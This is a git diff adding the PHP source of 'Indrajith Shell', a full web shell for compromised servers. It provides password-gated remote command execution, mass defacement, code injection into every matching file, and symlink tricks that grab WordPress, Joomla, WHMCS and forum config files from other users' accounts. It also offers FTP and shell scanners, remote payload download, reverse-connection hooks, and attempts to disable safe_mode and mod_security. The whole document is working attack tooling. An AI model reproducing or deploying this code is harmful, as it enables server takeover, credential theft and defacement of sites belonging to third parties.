"; + switch($opt) + { + case "WGET": + if($os!='win') + { + cmd("wget $rt_ffile"); + alert("Downloaded Successfully..."); + } + else + { + alert("Its Windows OS... WGET is not available"); + } + break; + case "cURL": + if(function_exists('curl_init')) + { + $ch = curl_init($rt_ffile); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); + $data = curl_exec($ch); + curl_close($ch); + file_put_contents($name, $data); + alert("Download succeeded"); + } + else + { + alert("cURL Not Available"); + } + break; + } + echo "
"; +} + +function hex_encode_ui() +{ + if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx'])) + { + $tyx=$_POST['tyxxx']; + $rezultzz=$_POST['hexinp']; + switch($tyx) + { + case "Encode": + $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz); + echo "

HEXADECIMAL ENCODER




+ +

+ Input :




"; + break; + case "Decode": + $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz); + echo "

HEXADECIMAL ENCODER




+ +

+ Input :




"; + break; + } + } + else + { + echo "

HEXADECIMAL ENCODER




+ +

+ Input :




"; + } +} + +function killme() +{ + global $self; + echo "

Good Bye Dear


Dear, Good by... :( Hope You Like me...





"; + $me=basename($self); + unlink($me); +} + +function ftp_anonymous_ui() +{ + echo "

Anonymous FTP Scanner







"; +} + +function ftp_anonymous_bg() +{ + echo "

Result




"; + $ftp_list=$_GET['ftp_anonz']; + $xftpl = trim($ftp_list); + $xftpl = explode("\n", $xftpl); + foreach($xftpl as $xftp) + { + $xftp = str_replace("ftp://", "", $xftp); + $conn_ftp = ftp_connect($xftp); + $success = ftp_login($conn_ftp, "anonymous", ""); + if($success) + { + echo ""; + } + else + { + echo ""; + } + + } + echo "
$xftpSuccessfull
$xftpFailed





"; +} + +function mass_deface_ui() +{ + echo "

Mass Deface




+
Name :





"; +} + +function mass_deface_bg() +{ + global $sep; + $d_path=$_GET['mm_path']; + chdir($d_path); + $d_file=$_GET['mass_name']; + $d_conten=$_GET['mass_cont']; + if(is_dir($d_path)) + { + chdir($d_path); + $d_dirs=array(); + if($handle=opendir($d_path)) + { + while(($item=readdir($handle))!==FALSE) + { + if($item=="."){continue;} + if($item==".."){continue;} + if(is_dir($item)) + { + array_push($d_dirs, $item); + } + } + } + } + echo "

Result




"; + foreach($d_dirs as $d_dir) + { + $xd_path=getcwd()."$sep$d_dir$sep$d_file"; + if(is_writable($d_dir)) + { + $handle=fopen($xd_path, "wb"); + if($handle) + { + fwrite($handle, $d_conten); + } + } + echo ""; + } + echo "
$xd_path





"; +} + + +function symlinkg($usernamexx,$domainxx) +{ + symlink('/home/'.$usernamexx.'/public_html/vb/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin1.txt'); + symlink('/home/'.$usernamexx.'/public_html/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin2.txt'); + symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin3.txt'); + symlink('/home/'.$usernamexx.'/public_html/cc/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin4.txt'); + symlink('/home/'.$usernamexx.'/public_html/inc/config.php','Indrajith/'.$domainxx.' =>mybb.txt'); + symlink('/home/'.$usernamexx.'/public_html/config.php','Indrajith/'.$domainxx.' =>Phpbb1.txt'); + symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>Phpbb2.txt'); + symlink('/home/'.$usernamexx.'/public_html/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress1.txt'); + symlink('/home/'.$usernamexx.'/public_html/blog/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress2.txt'); + symlink('/home/'.$usernamexx.'/public_html/configuration.php','Indrajith/'.$domainxx.' =>Joomla1.txt'); + symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php','Indrajith/'.$domainxx.' =>Joomla2.txt'); + symlink('/home/'.$usernamexx.'/public_html/joomla/configuration.php','Indrajith/'.$domainxx.' =>Joomla3.txt'); + symlink('/home/'.$usernamexx.'/public_html/whm/configuration.php','Indrajith/'.$domainxx.' =>Whm1.txt'); + symlink('/home/'.$usernamexx.'/public_html/whmc/configuration.php','Indrajith/'.$domainxx.' =>Whm2.txt'); + symlink('/home/'.$usernamexx.'/public_html/support/configuration.php','Indrajith/'.$domainxx.' =>Whm3.txt'); + symlink('/home/'.$usernamexx.'/public_html/client/configuration.php','Indrajith/'.$domainxx.' =>Whm4.txt'); + symlink('/home/'.$usernamexx.'/public_html/billings/configuration.php','Indrajith/'.$domainxx.' 
=>Whm5.txt'); + symlink('/home/'.$usernamexx.'/public_html/billing/configuration.php','Indrajith/'.$domainxx.' =>Whm6.txt'); + symlink('/home/'.$usernamexx.'/public_html/clients/configuration.php','Indrajith/'.$domainxx.' =>Whm7.txt'); + symlink('/home/'.$usernamexx.'/public_html/whmcs/configuration.php','Indrajith/'.$domainxx.' =>Whm8.txt'); + symlink('/home/'.$usernamexx.'/public_html/order/configuration.php','Indrajith/'.$domainxx.' =>Whm9.txt'); + symlink('/home/'.$usernamexx.'/public_html/admin/conf.php','Indrajith/'.$domainxx.' =>5.txt'); + symlink('/home/'.$usernamexx.'/public_html/admin/config.php','Indrajith/'.$domainxx.' =>4.txt'); + symlink('/home/'.$usernamexx.'/public_html/conf_global.php','Indrajith/'.$domainxx.' =>invisio.txt'); + symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>7.txt'); + symlink('/home/'.$usernamexx.'/public_html/connect.php','Indrajith/'.$domainxx.' =>8.txt'); + symlink('/home/'.$usernamexx.'/public_html/mk_conf.php','Indrajith/'.$domainxx.' =>mk-portale1.txt'); + symlink('/home/'.$usernamexx.'/public_html/include/config.php','Indrajith/'.$domainxx.' =>12.txt'); + symlink('/home/'.$usernamexx.'/public_html/settings.php','Indrajith/'.$domainxx.' =>Smf.txt'); + symlink('/home/'.$usernamexx.'/public_html/includes/functions.php','Indrajith/'.$domainxx.' =>phpbb3.txt'); + symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>infinity.txt'); +} + +function config_grabber_bg() +{ + global $sym_htaccess,$sym_php_ini; + mkdir('INDRAJITH', 0777); + symlink("/", "INDRAJITH/root"); + $htaccess=fopen('INDRAJITH/.htaccess', 'wb'); + fwrite($htaccess,$sym_htaccess); + $php_ini_x=fopen('INDRAJITH/php.ini', 'wb'); + fwrite($php_ini_x, $sym_php_ini); + $usr=explode("\n",$_POST['user_z_list']); + foreach($usr as $uzer) + { + $u_er=trim($uzer); + symlinggg($u_er); + } + echo ""; + alert('Config Grab compted. 
Check configs in direcory INDRAJITH'); +} + +if(isset($_POST['user_z_list'])) +{ + config_grabber_bg(); +} + + +function config_grabber_ui() +{ + if(file('/etc/passwd')) + { + ?>

Config Grabber










blog/configuration.php"); + symlink('/home/'.$user.'/public_html/forum/includes/config.php', "INDRAJITH/".$user." =>forum/includes/config.php"); + symlink("/home/".$user."/public_html/wp-config.php", "INDRAJITH/".$user." =>wp-config.php"); + symlink("/home/".$user."/public_html/wordpress/wp-config.php", "INDRAJITH/".$user." =>wordpress/wp-config.php"); + symlink("/home/".$user."/public_html/configuration.php", "INDRAJITH/".$user." =>configuration.php"); + symlink("/home/".$user."/public_html/blog/wp-config.php", "INDRAJITH/".$user." =>blog/wp-config.php"); + symlink("/home/".$user."/public_html/joomla/configuration.php", "INDRAJITH/".$user." =>joomla/configuration.php"); + symlink("/home/".$user."/public_html/vb/includes/config.php", "INDRAJITH/".$user." =>vb/includes/config.php"); + symlink("/home/".$user."/public_html/includes/config.php", "INDRAJITH/".$user." =>includes/config.php"); + symlink("/home/".$user."/public_html/conf_global.php", "INDRAJITH/".$user." =>conf_global.php"); + symlink("/home/".$user."/public_html/inc/config.php", "INDRAJITH/".$user." =>inc/config.php"); + symlink("/home/".$user."/public_html/config.php", "INDRAJITH/".$user." =>config.php"); + symlink("/home/".$user."/public_html/Settings.php", "INDRAJITH/".$user." =>/Settings.php"); + symlink("/home/".$user."/public_html/sites/default/settings.php", "INDRAJITH/".$user." =>sites/default/settings.php"); + symlink("/home/".$user."/public_html/whm/configuration.php", "INDRAJITH/".$user." =>whm/configuration.php"); + symlink("/home/".$user."/public_html/whmcs/configuration.php", "INDRAJITH/".$user." =>whmcs/configuration.php"); + symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php"); + symlink("/home/".$user."/public_html/whmc/WHM/configuration.php", "INDRAJITH/".$user." =>whmc/WHM/configuration.php"); + symlink("/home/".$user."/public_html/whm/WHMCS/configuration.php", "INDRAJITH/".$user." 
=>whm/WHMCS/configuration.php"); + symlink("/home/".$user."/public_html/whm/whmcs/configuration.php", "INDRAJITH/".$user." =>whm/whmcs/configuration.php"); + symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php"); + symlink("/home/".$user."/public_html/clients/configuration.php", "INDRAJITH/".$user." =>clients/configuration.php"); + symlink("/home/".$user."/public_html/client/configuration.php", "INDRAJITH/".$user." =>client/configuration.php"); + symlink("/home/".$user."/public_html/clientes/configuration.php", "INDRAJITH/".$user." =>clientes/configuration.php"); + symlink("/home/".$user."/public_html/cliente/configuration.php", "INDRAJITH/".$user." =>cliente/configuration.php"); + symlink("/home/".$user."/public_html/clientsupport/configuration.php", "INDRAJITH/".$user." =>clientsupport/configuration.php"); + symlink("/home/".$user."/public_html/billing/configuration.php", "INDRAJITH/".$user." =>billing/configuration.php"); + symlink("/home/".$user."/public_html/admin/config.php", "INDRAJITH/".$user." 
=>admin/config.php"); +} + +function sym_xxx() +{ + global $sym_htaccess,$sym_php_ini; + mkdir('Indrajith', 0777); + symlink("/", "Indrajith/root"); + $htaccess=@fopen('Indrajith/.htaccess', 'w'); + fwrite($htaccess,$sym_htaccess); + $php_ini_x=fopen('Indrajith/php.ini', 'w'); + fwrite($php_ini_x, $sym_php_ini); + $akps = implode(file("/etc/named.conf")); + if(!$akps) + { + config_grabber_ui(); + } + else + { + $usrd = array(); + foreach($akps as $akp) + { + if(eregi("zone", $akp)) + { + preg_match_all('#zone "(.*)" #', $akp, $akpzz); + flush(); + if(strlen(trim($akpzz[1][0]))>2) + { + $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0])); + symlinkg($akpzz[1][0],$user['name']); + flush(); + } + } + } + } +} + +function sym_link() +{ + global $sym_htaccess,$sym_php_ini; + cmd('rm -rf AKP'); + mkdir('AKP', 0755); + $usrd = array(); + $akps = implode(file("/etc/named.conf")); + $htaccess=fopen('AKP/.htaccess', 'w'); + fwrite($htaccess,$sym_htaccess); + $php_ini_x=fopen('AKP/php.ini', 'w'); + fwrite($php_ini_x, $sym_php_ini); + symlink("/", "AKP/root"); + if(!$file) + { + echo ""; + echo "

SymLink




"; + $users = file('/etc/passwd'); + foreach($users as $user) + { + $user = explode(':', $user); + echo ""; + } + echo "
UsersExploit
".$user[0]."SymLink





"; + + } + else + { + echo ""; + foreach($akps as $akp) + { + if(eregi("zone", $akp)) + { + preg_match_all('#zone "(.*)" #', $akp, $akpzz); + flush(); + if(strlen(trim($akpzz[1][0]))>2) + { + $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0])); + echo "
DomainsUsersExploit
".$akpzz[1][0]."".$user['name']."SymLink
"; + flush(); + } + } + } + } +} + +function shell_finder_ui() +{ + echo "

SH3LL SCANNER





URL :





"; +} + +function shell_finder_bg() +{ + $sh_url=$_GET['sh311_scanx']; + echo "

SHELL SCAN




"; + $ShellZ=array("indrajith.php", "c99.php", "c100.php","r57.php", "b374k.php", "c22.php", "sym.php", "symlink_sa.php", "r00t.php", "webr00t.php", "sql.php","cpanel.php", "wso.php", "404.php", "aarya.php", "greenshell.php", "ddos.php", "madspot.php", "1337.php", "31337.php", "WSO.php", "dz.php", "cpn.php", "sh3ll.php", "mysql.php", "killer.php", "cgishell.pl", "dz0.php", "whcms.php", "vb.php", "gaza.php", "d0mains.php", "changeall.php", "h4x0r.php", "L3b.php", "uploads.php", "shell.asp", "cmd.asp", "sh3ll.asp", "b374k-2.2.php", "m1n1.php", "b374km1n1.php"); + foreach($ShellZ as $shell) + { + $urlzzx=$sh_url.$shell; + if(function_exists('curl_init')) + { + echo ""; + $ch = curl_init($urlzzx); + curl_setopt($ch, CURLOPT_NOBODY, true); + curl_exec($ch); + $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE); + curl_close($ch); + if($status_code==200) + { + echo ""; + } + else + { + echo ""; + } + } + else + { + echo "cURL Not Found "; + break; + } + } + echo "
Checking : $urlzzx Found....
Not Found...





"; +} + +function code_in_ui() +{ + global $sep; + $mode=$_POST['modexxx']; + $ftype=$_POST['ffttype']; + $c_cont=$_POST['code_cont']; + $ppp=$_POST['path']; + if(isset($_POST['modexxx']) && isset($_POST['path']) && isset($_POST['ffttype']) && isset($_POST['code_cont']) && $mode!="" && $ftype!="" && $c_cont!="" && $ppp!="") + { + echo "

Successfully c0d3 inj3cted

"; + switch($mode) + { + case "Apender": + $mmode="a"; + break; + case "Rewrite": + $mmode="w"; + break; + } + if($handle = opendir($ppp)) + { + while(($c_file = readdir($handle)) !== False) + { + if((preg_match("/$ftype".'$'.'/', $c_file , $matches) != 0) && (preg_match('/'.$c_file.'$/', $self , $matches) != 1)) + { + echo ""; + $fd = fopen($ppp.$sep.$c_file,$mmode); + if($fd) + { + fwrite($fd,$c_cont); + } + else + { + alert("Error. Access Denied"); + } + } + } + } + echo "
$ppp$sep$c_file





"; + } + else + { + ?> +

c0de inj3ct




+ +
Mode :
File Type
Content :





+ +

SSH Manager




HOST :
Username :
Password :





+ +

SSH Shell by Indrajith Shell




+
CMD :





+ +

SSH Shell by Indrajith Shell




+
CMD :





+ +

FTP Manager




+ + + + + +
HOST :
Username :
Password :
Path [Optional] :
Upload File From Server [Optional] :
Download File To Server [Optional] :





+

FTP FILEMANAGER


"; + $fhost=$_GET['ftp_host']; + $fuser=$_GET['ftp_user']; + $fpass=$_GET['ftp_pass']; + $fpath=$_GET['fpath']; + $upl=$_GET['upload_file']; + $down=$_GET['download_file']; + if($fpath=="") + { + $fpath=ftp_pwd($conn); + } + $conn=ftp_connect($fhost); + if(!$conn) + { + alert("FTP Host Not Found!!!"); + } + $log=ftp_login($conn, $fuser, $fpass); + if(!$log) + { + alert("FTP Authorication Failed"); + } + if($upl!="") + { + $fp = fopen($upl, 'r'); + if (ftp_fput($conn, $upl, $fp, FTP_ASCII)) + { + echo "
Successfully uploaded $upl
"; + } + else + { + echo "
There was a problem while uploading $upl
"; + } + } + if($down!="") + { + $handle = fopen($down, 'w'); + if (ftp_fget($conn, $handle, $down, FTP_ASCII, 0)) + { + echo "
successfully written to $down
"; + } + else + { + echo "
There was a problem while downloading $down to $down
"; + } + } + echo ""; + ftp_chdir($fpath); + $list=ftp_rawlist($conn, $fpath); + foreach($list as $fff) + { + echo ""; + } + echo "
Files
$fff
";
+}
+
+//////////////////////////////// Frond End Calls ///////////////////////////////
+
+if(isset($_POST['e_file']) && isset($_POST['e_content_n']))
+{
+ edit_file_bg();
+}
+
+else if(isset($_REQUEST['sh311_scanner']))
+{
+ shell_finder_ui();
+}
+
+else if(isset($_REQUEST['ftp_host']) && isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass']))
+{
+ ftp_man_bg();
+}
+
+else if(isset($_REQUEST['ftpman']))
+{
+ ftp_man_ui();
+}
+
+else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user']) && isset($_GET['ssh_pass']))
+{
+ ssh_man_bg();
+}
+
+else if(isset($_REQUEST['sshman']))
+{
+ ssh_man_ui();
+}
+
+else if(isset($_REQUEST['c0de_inject']) && isset($_REQUEST['path']))
+{
+ chdir($_GET['path']);
+ code_in_ui();
+}
+
+else if(isset($_GET['sh311_scanx']))
+{
+ shell_finder_bg();
+}
+
+else if(isset($_REQUEST['config_grab']))
+{
+ sym_xxx();
+}
+
+else if(isset($_REQUEST['ftp_man']))
+{
+ ftp_man_ui();
+}
+
+else if(isset($_REQUEST['mass_xploit']))
+{
+ mass_deface_ui();
+}
+
+else if(isset($_GET['f_host']) && isset($_GET['f_user']) && isset($_GET['f_pass']))
+{
+ ftp_man_bg();
+}
+
+else if(isset($_GET['mass_name']) && isset($_GET['mass_cont']))
+{
+ mass_deface_bg();
+}
+
+else if(isset($_REQUEST['ftp_anon_scan']))
+{
+ ftp_anonymous_ui();
+}
+
+else if(isset($_GET['ftp_anonz']))
+{
+ ftp_anonymous_bg();
+}
+
+else if(isset($_REQUEST['killme']))
+{
+ killme();
+}
+
+else if(isset($_REQUEST['hexenc']))
+{
+ hex_encode_ui();
+}
+
+else if(isset($_REQUEST['remotefiledown']))
+{
+ remote_download_ui();
+}
+
+else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path']))
+{
+ remote_download_bg();
+}
+
+else if(isset($_REQUEST['cpanel_crack']))
+{
+ cpanel_crack();
+}
+
+else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz']))
+{
+ remote_file_check_bg();
+}
+
+else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content']))
+{
+ php_ende_bg();
+}
+
+else if(isset($_REQUEST['remote_server_scan']))
+{
+ remote_file_check_ui();
+}
+
+else if(isset($_REQUEST['server_exploit_details']))
+{
+ exploit_details();
+}
+
+else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content']))
+{
+ massmailer_bg();
+}
+
+else if(isset($_REQUEST['mysqlman']))
+{
+ mysqlman();
+}
+
+else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content']))
+{
+ mailbomb_bg();
+}
+
+else if(isset($_REQUEST['cookiejack']))
+{
+ cookie_jack();
+}
+
+else if(isset($_REQUEST['massmailer']))
+{
+ massmailer_ui();
+}
+
+else if(isset($_REQUEST['rename']))
+{
+ chdir($_GET['path']);
+ rename_ui();
+}
+
+else if(isset($_GET['old_name']) && isset($_GET['new_name']))
+{
+ chdir($_GET['path']);
+ rename_bg();
+}
+
+else if(isset($_REQUEST['encodefile']))
+{
+ php_ende_ui();
+}
+
+else if(isset($_REQUEST['edit']))
+{
+ edit_file();
+}
+
+else if(isset($_REQUEST['down']) && isset($_REQUEST['path']))
+{
+ download();
+}
+
+else if(isset($_REQUEST['gzip']) && isset($_REQUEST['path']))
+{
+ download_gzip();
+}
+
+else if(isset($_REQUEST['read']))
+{
+ chdir($_GET['path']);
+ code_viewer();
+}
+
+else if(isset($_REQUEST['perm']))
+{
+ chdir($_GET['path']);
+ ch_perm_ui();
+}
+
+else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm']))
+{
+ chdir($_GET['path']);
+ ch_perm_bg();
+}
+
+else if(isset($_REQUEST['del_fil']))
+{
+ chdir($_GET['path']);
+ delete_file();
+ exit;
+}
+else if(isset($_REQUEST['phpinfo']))
+{
+ chdir($_GET['path']);
+ ob_clean();
+ echo phpinfo();
+ exit;
+}
+else if(isset($_REQUEST['del_dir']))
+{
+ chdir($_GET['path']);
+ $d_dir=$_GET['del_dir'];
+ deldirs($d_dir);
+}
+else if(isset($_GET['path']) && isset($_GET['new_file']))
+{
+ chdir($_GET['path']);
+ mk_file_ui();
+}
+else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content']))
+{
+ mk_file_bg();
+}
+else if(isset($_GET['path']) && isset($_GET['new_dir']))
+{
+ chdir($_GET['path']);
+ create_dir();
+}
+else if(isset($_GET['path']) && isset($_GET['cmdexe']))
+{
+ chdir($_GET['path']);
+ cmd();
+}
+else if(isset($_POST['upload_f']) && isset($_POST['path']))
+{
+ upload_file();
+}
+else if(isset($_REQUEST['rs']))
+{
+ reverse_conn_ui();
+}
+else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port']))
+{
+ reverse_conn_bg();
+}
+else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path']))
+{
+ chdir($_GET['path']);
+ safe_mode_fuck_ui();
+}
+else if(isset($_GET['path']) && isset($_GET['safe_mode']))
+{
+ safe_mode_fuck();
+}
+else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir']))
+{
+ AccessDenied();
+}
+
+else if(isset($_REQUEST['symlink']))
+{
+ sym_link();
+}
+
+else if(isset($_GET['path']) && isset($_GET['copy']))
+{
+ copy_file_ui();
+}
+else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name']))
+{
+ copy_file_bg();
+}
+else
+{
+ filemanager_bg();
+}
+
+////////////////////////////// End Frond End Calls //////////////////////////////
+
+echo "

+
PWD :
+ + + + + + + + +
New File :
+
: New Dir
+
CMD :
+
: Upload File
+

© AJITH KP & VISHNU NATH KP ©
® TOF [2012] ®

"
+?>
diff --git a/php/indrajith.txt b/php/indrajith.txt
new file mode 100644
index 0000000..cefb2ba
--- /dev/null
+++ b/php/indrajith.txt
@@ -0,0 +1,1782 @@
+";
+ echo "";
+ if($_COOKIE["user"] != $usernameame && $_COOKIE["pass"] != md5($password))
+ {
+ if($_POST["usrname"]==$usernameame && $_POST["passwrd"]==$password)
+ {
+ print'';
+ }
+ else
+ {
+ if($_POST['usrname'])
+ {
+ print'';
+ }
+ echo 'INDRAJITH SHELL
+

+ >>>>>>>>>>>>>>><<<<<>>>>>>>>>> +

+
+
INDRAJITH SHELL
+
+ + +
+ + +
Login:
Password:
 
+
'; + exit; + } + } + + +$color_g="green"; +$color_b="4C83AF"; +$color_bg="#111111"; +$color_hr="#222"; +$color_wri="green"; +$color_rea="yellow"; +$color_non="red"; +$path=$_GET['path']; + +@session_start(); +//@error_reporting(5); +@set_time_limit(0); +@ini_restore("safe_mode_include_dir"); +@ini_restore("safe_mode_exec_dir"); +@ini_restore("disable_functions"); +@ini_restore("allow_url_fopen"); +@ini_restore("safe_mode"); +@ini_restore("open_basedir"); + +$sep="/"; +if(strtolower(substr(PHP_OS,0,3))=="win") +{ + $os="win"; + $sep="\\"; + $ox="Windows"; +} +else +{ + $os="nix"; + $ox="Linux"; +} + + + +$self=$_SERVER['PHP_SELF']; +$srvr_sof=$_SERVER['SERVER_SOFTWARE']; +$your_ip=$_SERVER['REMOTE_ADDR']; +$srvr_ip=$_SERVER['SERVER_ADDR']; +$admin=$_SERVER['SERVER_ADMIN']; + +$s_php_ini="safe_mode=OFF +disable_functions=NONE"; + +$ini_php=""; + +$s_htaccess=" +Sec------Engine Off +Sec------ScanPOST Off +"; + +$s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI +AddType application/x-httpd-cgi .sh +AddHandler cgi-script .pl +AddHandler cgi-script .pl"; + +$sym_htaccess="Options all +DirectoryIndex Sux.html +AddType text/plain .php +AddHandler server-parsed .php +AddType text/plain .html +AddHandler txt .html +Require None +Satisfy Any"; + +$sym_php_ini="safe_mode=OFF +disable_functions=NONE"; + +$forbid_dir="Options -Indexes"; + +$cookie_highjacker="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"; + +/*----------------------- Top Menu ------------------------------------------*/ + +if($safemode=="On") +{ + echo ""; +} +else +{ + echo ""; +} + +echo ""; + +echo "INDRAJITH SHELL
+ + + + + + + +
+
+

INDRAJITH

MINI SHELL +
+
+
OS : + ".$ox." | ".php_uname()."
+ Your IP : ".$your_ip." | Server IP : ".$srvr_ip." | Admin : {$admin}
+ MySQL : "; echo mysqlx(); + echo " | Oracle : "; echo oraclesx(); + echo " | MSSQL : "; echo mssqlx(); + echo " | PostGreySQL : ";echo postgreyx(); + echo "
cURL : ";echo curlx(); + echo " | Total Space : "; echo disc_size(); + echo " | Free Space : "; echo freesize(); + echo "
Software : {$srvr_sof} | PHP : ".phpversion()." +
Disabled Functions : ";echo disabled_functns()."
"; + if($os == 'win'){ echo "Drives : ";echo drivesx(); } + echo " +
+
";
+echo "";
+/*----------------------- End of Top Menu -----------------------------------*/
+
+
+/*--------------- FUNCTIONS ----------------*/
+function alert($alert_txt)
+{
+ echo "";
+}
+
+function disabled_functns()
+{
+ if(!@ini_get('disable_functions'))
+ {
+ echo "None";
+ }
+ else
+ {
+ echo @ini_get('disable_functions');
+ }
+}
+
+
+function drivesx()
+{
+ foreach(range('A','Z') as $drive)
+ {
+ if(is_dir($drive.':\\'))
+ {
+ echo "[".$drive."]";
+ }
+ }
+}
+
+function filesizex($size)
+{
+ if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
+ elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
+ elseif ($size>=1024)$size = round(($size/1024),2)." KB";
+ else $size .= " B";
+ return $size;
+}
+
+function disc_size()
+{
+ echo filesizex(disk_total_space("/"));
+}
+
+function freesize()
+{
+ echo filesizex(disk_free_space("/"));
+}
+
+function file_perm($filz){
+ if($m=fileperms($filz)){
+ $p='';
+ $p .= ($m & 00400) ? 'r' : '-';
+ $p .= ($m & 00200) ? 'w' : '-';
+ $p .= ($m & 00100) ? 'x' : '-';
+ $p .= ($m & 00040) ? 'r' : '-';
+ $p .= ($m & 00020) ? 'w' : '-';
+ $p .= ($m & 00010) ? 'x' : '-';
+ $p .= ($m & 00004) ? 'r' : '-';
+ $p .= ($m & 00002) ? 'w' : '-';
+ $p .= ($m & 00001) ? 'x' : '-';
+ return $p;
+ }
+ else return "?????";
+}
+
+
+function mysqlx()
+{
+ if(function_exists('mysql_connect'))
+ {
+ echo "Enabled";
+ }
+ else
+ {
+ echo "Disabled";
+ }
+}
+
+function oraclesx()
+{
+ if(function_exists('oci_connect'))
+ {
+ echo "Enabled";
+ }
+ else
+ {
+ echo "Disabled";
+ }
+}
+
+function mssqlx()
+{
+ if(function_exists('mssql_connect'))
+ {
+ echo "Enabled";
+ }
+ else
+ {
+ echo "Disabled";
+ }
+}
+
+function postgreyx()
+{
+ if(function_exists('pg_connect'))
+ {
+ echo "Enabled";
+ }
+ else
+ {
+ echo "Disabled";
+ }
+}
+
+function curlx()
+{
+ if(function_exists('curl_version'))
+ {
+ echo "Enabled";
+ }
+ else
+ {
+ echo "Disabled";
+ }
+}
+
+function filesize_x($filex)
+{
+ $f_size=filesizex(filesize($filex));
+ return $f_size;
+}
+
+function rename_ui()
+{
+ $rf_path=$_GET['rename'];
+ echo "

Rename




New Name :






"; +} + +function filemanager_bg() +{ + global $sep, $self; + $path=!empty($_GET['path'])?$_GET['path']:getcwd(); + $dirs=array(); + $fils=array(); + if(is_dir($path)) + { + chdir($path); + if($handle=opendir($path)) + { + while(($item=readdir($handle))!==FALSE) + { + if($item=="."){continue;} + if($item==".."){continue;} + if(is_dir($item)) + { + array_push($dirs, $path.$sep.$item); + } + else + { + array_push($fils, $path.$sep.$item); + } + } + } + else + { + alert("Access Denied for this operation"); + } + } + else + { + alert("Directory Not Found!!!"); + } + echo "
+ + + + + + "; + foreach($dirs as $dir) + {//chdir(isset($_GET['path'])) + echo " + + + "; + } + foreach($fils as $fil) + { + echo " + + + "; + } + echo "
NameSizePermissionsActions
".basename($dir)."".filesize_x($dir)."".file_perm($dir)."Delete | Rename
".basename($fil)."".filesize_x($fil)."".file_perm($fil)."Delete | Rename | Edit | Download | Copy
"; +} + +function rename_bg() +{ + if(isset($_GET['old_name']) && isset($_GET['new_name'])) + { + $o_r_path=basename($_GET['old_name']); + $r_path=str_replace($o_r_path, "", $_GET['old_name']); + $r_new_name=$r_path.$_GET['new_name']; + echo $r_new_name; + if(rename($_GET['old_name'], $r_new_name)==FALSE) + { + alert("Access Denied for this action!!!"); + } + else + { + alert("Renamed File Succeessfully"); + } + } +} + +function edit_file() +{ + $path=$_GET['path']; + chdir($path); + $edt_file=$_GET['edit']; + $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file))); + if($e_content) + { + $o_content=$e_content; + } + else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) + { + $fd = fopen($edt_file, "rb"); + if(!$fd) + { + alert("Permission Denied"); + } + else + { + while(!feof($fd)) + { + $o_content=wordwrap(htmlspecialchars(fgets($fd))); + } + } + fclose($fd); + } + echo "

View File : ". basename($_GET['edit']) ."



+

+
"; +} +function edit_file_bg() +{ + if(file_exists($_POST['e_file'])) + { + $handle = fopen($_POST['e_file'],"w+"); + if (!handle) + { + alert("Permission Denied"); + } + else + { + fwrite($handle,$_POST['e_content_n']); + alert("Your changes were Successfully Saved!"); + } + fclose($handle); + } + else + { + alert("File Not Found!!!"); + } +} +function delete_file() +{ + $del_file=$_GET['del_fil']; + if(unlink($del_file) != FALSE) + { + alert("Deleted Successfully"); + exit; + } + else + { + alert("Access Denied for this Operation"); + exit; + } +} +function deldirs($d_dir) +{ + $d_files= glob($d_dir.'*', GLOB_MARK); + foreach($d_files as $d_file) + { + if(is_dir($d_file)) + { + deldirs($d_file); + } + else + { + unlink($d_file); + } + } + if(is_dir($d_dir)) + { + if(rmdir($d_dir)) + { + alert("Deleted Directory Successfully"); + } + else + { + alert("Access Denied for this Operation"); + } + } +} +function download() +{ + $d_file=$_GET['down']; + $d_name=basename($d_file); + if (file_exists($d_file)) + { + header('Content-Description: File Transfer'); + header('Content-Type: application/octet-stream'); + header('Content-Disposition: attachment; filename='. basename($d_file)); + header('Content-Transfer-Encoding: binary'); + header('Expires: 0'); + header('Cache-Control: must-revalidate'); + header('Pragma: public'); + header('Content-Length: ' . filesize($d_file)); + ob_clean(); + + readfile($d_file); + exit; + } +} +function code_viewer() +{ + $path=$_GET['path']; + $r_file=$_GET['read']; + $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file))); + if($r_content) + { + $rr_content=$r_content; + } + else if(function_exists('fgets') && function_exists('fopen') && 